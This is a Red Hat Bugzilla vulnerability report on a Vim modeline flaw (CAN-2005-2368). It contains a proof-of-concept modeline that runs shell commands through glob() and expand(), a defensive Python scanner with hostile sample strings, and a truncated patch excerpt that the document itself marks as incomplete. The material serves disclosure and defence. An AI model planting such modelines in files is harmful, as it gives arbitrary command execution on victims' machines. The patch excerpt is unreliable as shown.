Red Hat Bugzilla – Bug 164488
CAN-2005-2368 modelines in vim can own you
Last modified: 2007-08-30 15:57:07 EDT
From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Mozilla rulez!)
Description of problem:
An evil modeline can execute arbitrary shell commands when you open a file with Vim.
Version-Release number of selected component (if applicable):
vim-common-6.1-18.7x.2.3.legacy (rh7.3) vim-common-6.1-29.3.legacy (rh9)
Steps to Reproduce:
1. echo 'vim: foldmethod=expr:foldexpr=glob("`touch\ /tmp/where_do_you_want_bill_gates_to_go_today\?`")+expand("$(touch$IFS/tmp/where_do_you_want_billg_to_go\?)"):' > /tmp/guninski.txt
(combination of Georgi's methods 1 and 2)
2. vim +p +q /tmp/guninski.txt
3. ls -l /tmp/where_do_you_want_*
Verified on RH73 and RH9 (with FL updates). FC1/2 are probably affected as well.
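Added example (not part of this bug report or of Vim itself): a small defensive scanner that mirrors how Vim looks for modelines (only the first and last 'modelines' lines, default 5) and flags any modeline whose options call glob() or expand() together with shell metacharacters, the combination used in the reproduction steps above. The modeline regex is a simplified assumption covering the common "vi:" / "vim:" / "ex:" prefixes, not Vim's full modeline grammar; the sample inputs are constructed.

```python
import re
from dataclasses import dataclass, field

# Vim only honours modelines in the first and last 'modelines' lines
# (default 5); mirror that so the scan matches what Vim would parse.
MODELINES = 5

# Simplified modeline prefix (assumption: Vim also accepts versioned forms
# such as "vim<700:" which this pattern does not cover).
MODELINE_RE = re.compile(r'(?:^|\s)(?:vi|vim|ex):\s*(.+)$')

# Expression functions named in CAN-2005-2368 and the shell metacharacters
# that turn them into a command execution when they reach the shell.
RISKY_FUNCS = re.compile(r'\b(glob|expand)\s*\(', re.IGNORECASE)
SHELL_META = re.compile(r'`|\$\(|\$IFS')


@dataclass
class Finding:
    lineno: int            # 1-based line of the modeline
    options: str           # the option string Vim would interpret
    functions: list = field(default_factory=list)
    shell_meta: bool = False


def candidate_indexes(n_lines):
    """Indexes of the lines Vim would examine for modelines."""
    head = list(range(min(MODELINES, n_lines)))
    tail = [i for i in range(max(n_lines - MODELINES, 0), n_lines) if i not in head]
    return head + tail


def scan_text(text):
    """Return a Finding for every modeline that uses glob()/expand() or shell metacharacters."""
    lines = text.splitlines()
    findings = []
    for i in candidate_indexes(len(lines)):
        m = MODELINE_RE.search(lines[i])
        if not m:
            continue
        opts = m.group(1)
        funcs = sorted({f.lower() for f in RISKY_FUNCS.findall(opts)})
        meta = bool(SHELL_META.search(opts))
        if funcs or meta:
            findings.append(Finding(i + 1, opts, funcs, meta))
    return findings


def is_suspicious(text):
    """True when a modeline combines an expression function with shell metacharacters."""
    return any(f.functions and f.shell_meta for f in scan_text(text))


# Constructed samples: an ordinary editor modeline and a hostile one in the
# shape of the report's reproduction step (placed on the last line so it sits
# inside the window Vim checks).
BENIGN = "#!/bin/sh\n# vim: set ts=4 sw=4 et:\necho hello\n"
HOSTILE = "some text\n" * 10 + 'vim: foldmethod=expr:foldexpr=glob("`touch /tmp/x`"):\n'
# A modeline outside the head/tail window is ignored, as Vim would ignore it.
IGNORED = "x\n" * 5 + 'vim: foldexpr=glob("`id`"):\n' + "x\n" * 6

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("hostile", HOSTILE), ("ignored", IGNORED)):
        print(name, is_suspicious(sample), scan_text(sample))
```

The scanner is a triage aid for files received from untrusted sources; the actual fix is the vendor update, and disabling modeline processing (`:set nomodeline`) removes this attack surface entirely.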
There is an official two-part patch for 6.3 at ftp://ftp.vim.org/pub/vim/patches/6.3/6.3.081 and ftp://ftp.vim.org/pub/vim/patches/6.3/6.3.082
Here is a merged version from Ubuntu (debian/patches/06_modeline_codeexec.diff):
diff -urN vim63/src/os_unix.c vim63.new/src/os_unix.c
--- vim63/src/os_unix.c 2005-07-26 11:16:28.769865769 +0000
+++ vim63.new/src/os_unix.c 2005-07-26 11:16:05.786180086 +0000
@@ -4697,6 +4697,12 @@
if (!have_wildcard(num_pat, pat))
return save_patterns(num_pat, pat, num_file, file);
+# ifdef HAVE_SANDBOX
+ /* Don't allow any shell command in the sandbox. */
+ if (sandbox != 0 && check_secure())
+ return FAIL;
* Don't allow the use of backticks in secure and restricted mode.
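Review bot: the hunk is truncated and should not be applied as shown. The header promises twelve lines after the change but only four `+` lines are visible, the `# endif` that closes `# ifdef HAVE_SANDBOX` is missing, and the final line `* Don't allow the use of backticks in secure and restricted mode.` is the opening of a second comment block whose code does not appear at all. Note also that the visible guard only fires when `sandbox != 0`, so by itself it does nothing for the restricted-mode case that missing comment describes. Fetch the two upstream patches (6.3.081 and 6.3.082) and compare them against the 6.1 `mch_expand_wildcards()` before backporting rather than relying on this excerpt.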
The patch appears to modify mch_expand_wildcards(). The 6.1 code looks similar enough to make this patch applicable without any substantial changes.
See https://rhn.redhat.com/errata/RHSA-2005-745.html for updated packages.
This affects all legacy distributions.
05.30.24 CVE: CAN-2005-2368
Platform: Cross Platform
Title: Vim ModeLines Further Variant Arbitrary Command Execution
Description: Vim is a text editor. It is susceptible to an arbitrary command execution vulnerability which can be caused by modifying a text file to include "ModeLines" containing the "glob()" or "expand()" functions with shell metacharacters. Vim version 6.3.082 is released to fix this issue.
Fedora Legacy project has ended. These will not be fixed by Fedora Legacy.